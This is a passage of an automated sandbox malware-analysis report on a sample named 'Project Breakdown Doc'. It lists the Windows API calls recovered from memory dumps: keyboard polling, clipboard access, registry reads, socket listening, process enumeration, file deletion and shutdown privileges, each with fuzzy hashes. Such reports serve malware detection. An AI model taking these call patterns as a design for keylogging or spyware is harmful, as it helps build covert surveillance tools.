                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00CC07D6
                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00CC086E
                                                  • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00CC0AAD
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00CC0ABA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                  • String ID:
                                                  • API String ID: 1240663315-0
                                                  • Opcode ID: 0f85c93ee4a56f9589bb3060355e2719a8d8c1efe9ba30ce49c3e506d4730c5f
                                                  • Instruction ID: 02f7d9fcdd31005fef3b62c6b0a5b3cb88cbfeb4cb156a0c7fb65292af2599f6
                                                  • Opcode Fuzzy Hash: 0f85c93ee4a56f9589bb3060355e2719a8d8c1efe9ba30ce49c3e506d4730c5f
                                                  • Instruction Fuzzy Hash: 70E14B31204210EFCB14DF25C885E6BBBE9FF89714B14856DF85ADB2A2DB30E905DB51
                                                  APIs
                                                  • GetKeyboardState.USER32(?), ref: 00CA0241
                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00CA02C2
                                                  • GetKeyState.USER32(000000A0), ref: 00CA02DD
                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00CA02F7
                                                  • GetKeyState.USER32(000000A1), ref: 00CA030C
                                                  • GetAsyncKeyState.USER32(00000011), ref: 00CA0324
                                                  • GetKeyState.USER32(00000011), ref: 00CA0336
                                                  • GetAsyncKeyState.USER32(00000012), ref: 00CA034E
                                                  • GetKeyState.USER32(00000012), ref: 00CA0360
                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00CA0378
                                                  • GetKeyState.USER32(0000005B), ref: 00CA038A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: State$Async$Keyboard
                                                  • String ID:
                                                  • API String ID: 541375521-0
                                                  • Opcode ID: 0f7852ccdf1a7ec8869f076b82a839e4e635b037364ddccbd0e03991711c8bf3
                                                  • Instruction ID: 3627573b8d37a2c9ef64dcfb124696f29a9d94163bd852bbff8b9893d40f4d81
                                                  • Opcode Fuzzy Hash: 0f7852ccdf1a7ec8869f076b82a839e4e635b037364ddccbd0e03991711c8bf3
                                                  • Instruction Fuzzy Hash: D541D9345057CB6EFF318B64C8087A5BEA16F133C8F28819DD6D6461C2E7955BC887A2
                                                  APIs
                                                    • Part of subcall function 00C49997: __itow.LIBCMT ref: 00C499C2
                                                    • Part of subcall function 00C49997: __swprintf.LIBCMT ref: 00C49A0C
                                                  • CoInitialize.OLE32 ref: 00CB8718
                                                  • CoUninitialize.OLE32 ref: 00CB8723
                                                  • CoCreateInstance.OLE32(?,00000000,00000017,00CD2BEC,?), ref: 00CB8783
                                                  • IIDFromString.OLE32(?,?), ref: 00CB87F6
                                                  • VariantInit.OLEAUT32(?), ref: 00CB8890
                                                  • VariantClear.OLEAUT32(?), ref: 00CB88F1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                  • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                  • API String ID: 834269672-1287834457
                                                  • Opcode ID: a19be72d01cca4cadcadd0fbf4d00b05d859fa6ec13d685cb208cb0e1820cd9d
                                                  • Instruction ID: 961239a532e6fdbe2bce5ab52974d9188c952e4aa05dc652c5e5b18e5cb97278
                                                  • Opcode Fuzzy Hash: a19be72d01cca4cadcadd0fbf4d00b05d859fa6ec13d685cb208cb0e1820cd9d
                                                  • Instruction Fuzzy Hash: 17619D70608311AFD710DF65C848BABBBE8EF49718F14481DF995AB291CB71ED48CB92
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                  • String ID:
                                                  • API String ID: 1737998785-0
                                                  • Opcode ID: 58c3316cdcfc4b6f788f04b9c7803f1966765b25a4dd2f720e315acb7a835309
                                                  • Instruction ID: 30659d9e09ccd6791fd867205d27fbab0462801f72bd1072f0a3b04c0dea1dfc
                                                  • Opcode Fuzzy Hash: 58c3316cdcfc4b6f788f04b9c7803f1966765b25a4dd2f720e315acb7a835309
                                                  • Instruction Fuzzy Hash: 3F21B035200620AFDB14AF64EC09FAE77AAEF04711F10802AF946DB3B2CB30AD01DB55
                                                  APIs
                                                    • Part of subcall function 00C448AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C448A1,?,?,00C437C0,?), ref: 00C448CE
                                                    • Part of subcall function 00CA4CD3: GetFileAttributesW.KERNEL32(?,00CA3947), ref: 00CA4CD4
                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00CA3ADF
                                                  • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00CA3B87
                                                  • MoveFileW.KERNEL32(?,?), ref: 00CA3B9A
                                                  • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00CA3BB7
                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CA3BD9
                                                  • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00CA3BF5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                  • String ID: \*.*
                                                  • API String ID: 4002782344-1173974218
                                                  • Opcode ID: 5a96f00995f9ea54b3561f95cecc89d776fcf6f806013bf8e6c7718cd891e45c
                                                  • Instruction ID: 8fc4629efaea9d7248565b0434f632ee4b013fc2678c15098a7ca50e7d41b4b8
                                                  • Opcode Fuzzy Hash: 5a96f00995f9ea54b3561f95cecc89d776fcf6f806013bf8e6c7718cd891e45c
                                                  • Instruction Fuzzy Hash: C951603180129D9FCF15EBA0DDA29EDB779AF15304F644169F45277092DF206F09EBA0
                                                  APIs
                                                    • Part of subcall function 00C47F41: _memmove.LIBCMT ref: 00C47F82
                                                  • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00CAF6AB
                                                  • Sleep.KERNEL32(0000000A), ref: 00CAF6DB
                                                  • _wcscmp.LIBCMT ref: 00CAF6EF
                                                  • _wcscmp.LIBCMT ref: 00CAF70A
                                                  • FindNextFileW.KERNEL32(?,?), ref: 00CAF7A8
                                                  • FindClose.KERNEL32(00000000), ref: 00CAF7BE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                  • String ID: *.*
                                                  • API String ID: 713712311-438819550
                                                  • Opcode ID: 03e620b7ef43525dbaefb61d24eee2c71fadb135f3ae255d67cc46c0c2c59e0e
                                                  • Instruction ID: 21fcca184d48644f5f11587e655c3a9dccabad5ee69d9ff499c80b0dca3ae7d8
                                                  • Opcode Fuzzy Hash: 03e620b7ef43525dbaefb61d24eee2c71fadb135f3ae255d67cc46c0c2c59e0e
                                                  • Instruction Fuzzy Hash: 4B41817190021A9FCF51DFA4CC89EEEBBB4FF06314F14456AE815A31A1DB309E45DB90
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                  • API String ID: 0-1546025612
                                                  • Opcode ID: 8b5703ac65831cf7b56fdb68a7f33a520483961d859c4ddadc8b57c80a8044b4
                                                  • Instruction ID: 59c609db8fa37405b323a03bea680003e249a154621a5b5f7f7da4e794d027b5
                                                  • Opcode Fuzzy Hash: 8b5703ac65831cf7b56fdb68a7f33a520483961d859c4ddadc8b57c80a8044b4
                                                  • Instruction Fuzzy Hash: 65A2B374D0421ACBDF28DF59C9807ADB7B1BF54319F2482A9DC25A7280E7309EC9DB58
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: _memmove
                                                  • String ID:
                                                  • API String ID: 4104443479-0
                                                  • Opcode ID: 3c91292b5e4a92af41a561590d88f0082b1229b4a22d15466b8b63db611b2c0b
                                                  • Instruction ID: 25cfe53cdd27668984a034ef859a2b6c818d78f83d69076fa89fabdaff116444
                                                  • Opcode Fuzzy Hash: 3c91292b5e4a92af41a561590d88f0082b1229b4a22d15466b8b63db611b2c0b
                                                  • Instruction Fuzzy Hash: 0912CA70A00609EFCF14DFA5D995AAEB3F5FF48300F204229E806E7291EB35AE55DB54
                                                  APIs
                                                    • Part of subcall function 00C98CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C98D0D
                                                    • Part of subcall function 00C98CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C98D3A
                                                    • Part of subcall function 00C98CC3: GetLastError.KERNEL32 ref: 00C98D47
                                                  • ExitWindowsEx.USER32(?,00000000), ref: 00CA549B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                  • String ID: $@$SeShutdownPrivilege
                                                  • API String ID: 2234035333-194228
                                                  • Opcode ID: 724fab79a7d59232308648269ba98cbe205c2d82040c4367f818d2596401bb09
                                                  • Instruction ID: 08f7c093cf274bdfb4f8ff8898b86c07c9e579d7926e269d9622a4576613aec8
                                                  • Opcode Fuzzy Hash: 724fab79a7d59232308648269ba98cbe205c2d82040c4367f818d2596401bb09
                                                  • Instruction Fuzzy Hash: 58014732654A072AE7285378EC4AFBA7258EB0F356F208034FD16E20D2DA500D8081A0
                                                  APIs
                                                  • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00CB65EF
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00CB65FE
                                                  • bind.WSOCK32(00000000,?,00000010), ref: 00CB661A
                                                  • listen.WSOCK32(00000000,00000005), ref: 00CB6629
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00CB6643
                                                  • closesocket.WSOCK32(00000000,00000000), ref: 00CB6657
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$bindclosesocketlistensocket
                                                  • String ID:
                                                  • API String ID: 1279440585-0
                                                  • Opcode ID: 661d123748f617d921fa23b8ff7ef576da6e98a51b8ff7839539ae0946e9f9fc
                                                  • Instruction ID: 988c1e582a5073af34732e4ab5d97d418279982792258fa8a5b6f5d0afc81fe2
                                                  • Opcode Fuzzy Hash: 661d123748f617d921fa23b8ff7ef576da6e98a51b8ff7839539ae0946e9f9fc
                                                  • Instruction Fuzzy Hash: 7D21A0306002149FCB10EF64C889FAEB7AAEF45320F148159F966E73D1CB74AD02DB51
                                                  APIs
                                                    • Part of subcall function 00C60FF6: std::exception::exception.LIBCMT ref: 00C6102C
                                                    • Part of subcall function 00C60FF6: __CxxThrowException@8.LIBCMT ref: 00C61041
                                                  • _memmove.LIBCMT ref: 00C9062F
                                                  • _memmove.LIBCMT ref: 00C90744
                                                  • _memmove.LIBCMT ref: 00C907EB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                  • String ID:
                                                  • API String ID: 1300846289-0
                                                  • Opcode ID: 5c04b0a13c36175940ac6f8aed066d5786a8ee62c79f15167c26b56dbf32b3e8
                                                  • Instruction ID: d18373eae9ee307c1df0129a07c6f4ac353555a36780ece4414f85e32429ba9c
                                                  • Opcode Fuzzy Hash: 5c04b0a13c36175940ac6f8aed066d5786a8ee62c79f15167c26b56dbf32b3e8
                                                  • Instruction Fuzzy Hash: C702DFB0E00209DFCF04DF64D995AAEBBB5FF44300F2480A9E806DB295EB31DA55DB95
                                                  APIs
                                                    • Part of subcall function 00C42612: GetWindowLongW.USER32(?,000000EB), ref: 00C42623
                                                  • DefDlgProcW.USER32(?,?,?,?,?), ref: 00C419FA
                                                  • GetSysColor.USER32(0000000F), ref: 00C41A4E
                                                  • SetBkColor.GDI32(?,00000000), ref: 00C41A61
                                                    • Part of subcall function 00C41290: DefDlgProcW.USER32(?,00000020,?), ref: 00C412D8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ColorProc$LongWindow
                                                  • String ID:
                                                  • API String ID: 3744519093-0
                                                  • Opcode ID: 924c5d2358ff2480c75bb517be06624662f4ff0d6cb0254c8afe68baffb84499
                                                  • Instruction ID: a86d247054faedb797c6099dd1e8c19971024943483b0191205a6ed64458f893
                                                  • Opcode Fuzzy Hash: 924c5d2358ff2480c75bb517be06624662f4ff0d6cb0254c8afe68baffb84499
                                                  • Instruction Fuzzy Hash: C7A15B71101544BFD628AF2A8C99FBF39ADFB41345B1C8119FCA6D61D1CE20CE81B2B5
                                                  APIs
                                                    • Part of subcall function 00CB80A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00CB80CB
                                                  • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00CB6AB1
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00CB6ADA
                                                  • bind.WSOCK32(00000000,?,00000010), ref: 00CB6B13
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00CB6B20
                                                  • closesocket.WSOCK32(00000000,00000000), ref: 00CB6B34
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                  • String ID:
                                                  • API String ID: 99427753-0
                                                  • Opcode ID: 6992e12cf6db6c80b4518ca5da9c4b167d7d4c0bfd452d4844af387fe2b95f6e
                                                  • Instruction ID: 25f72f3b91e33f70f4f7a5f97bc4f94e1e696252bb51d94ef7c25c24df8052c9
                                                  • Opcode Fuzzy Hash: 6992e12cf6db6c80b4518ca5da9c4b167d7d4c0bfd452d4844af387fe2b95f6e
                                                  • Instruction Fuzzy Hash: 5541B375B00220AFEB10BF24DC86F6E77A9EB45710F04805CF95AAB3D2DB749D01A791
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                  • String ID:
                                                  • API String ID: 292994002-0
                                                  • Opcode ID: ac720b63600681e9350a1915a299b76a13b30b3b404bac2006da4b5cf5bdc257
                                                  • Instruction ID: 3076457222fd88e05a2c3790c0bda74df81c847d74fd49b95b43de7f153ab9cf
                                                  • Opcode Fuzzy Hash: ac720b63600681e9350a1915a299b76a13b30b3b404bac2006da4b5cf5bdc257
                                                  • Instruction Fuzzy Hash: D611BF32300A206FE7216F26DC44F6FBB99FF54721B84442DF856D7341CB70EA829AA5
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00C81D88,?), ref: 00CBC312
                                                  • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00CBC324
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                  • API String ID: 2574300362-1816364905
                                                  • Opcode ID: 53d6f5b5fbff7f801f889e0ecb98dca7cc360989cc1654eb72f7b3577abf810d
                                                  • Instruction ID: a95280ac539dbabd5558e0f5377659fa3acedeeb70e7170e44d668091a488f25
                                                  • Opcode Fuzzy Hash: 53d6f5b5fbff7f801f889e0ecb98dca7cc360989cc1654eb72f7b3577abf810d
                                                  • Instruction Fuzzy Hash: 66E0ECB4600713CFDB204B25D854FDA76D4EB08755F84C43DE8AAD6260E770D981CA60
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: __itow__swprintf
                                                  • String ID:
                                                  • API String ID: 674341424-0
                                                  • Opcode ID: 39577a2062ac8090586890e3ca6ee6b43210676ae017b9f22fb744bafada4c40
                                                  • Instruction ID: 9c25876f66acd0df23504ce311e144ba8ceac82adcd0cc03960fb5dcea705432
                                                  • Opcode Fuzzy Hash: 39577a2062ac8090586890e3ca6ee6b43210676ae017b9f22fb744bafada4c40
                                                  • Instruction Fuzzy Hash: AB229A756083419FCB24EF24C891B6FB7E4BF84344F10491DF89A97291EB30EA48DB96
                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00CBF151
                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00CBF15F
                                                    • Part of subcall function 00C47F41: _memmove.LIBCMT ref: 00C47F82
                                                  • Process32NextW.KERNEL32(00000000,?), ref: 00CBF21F
                                                  • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00CBF22E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                  • String ID:
                                                  • API String ID: 2576544623-0
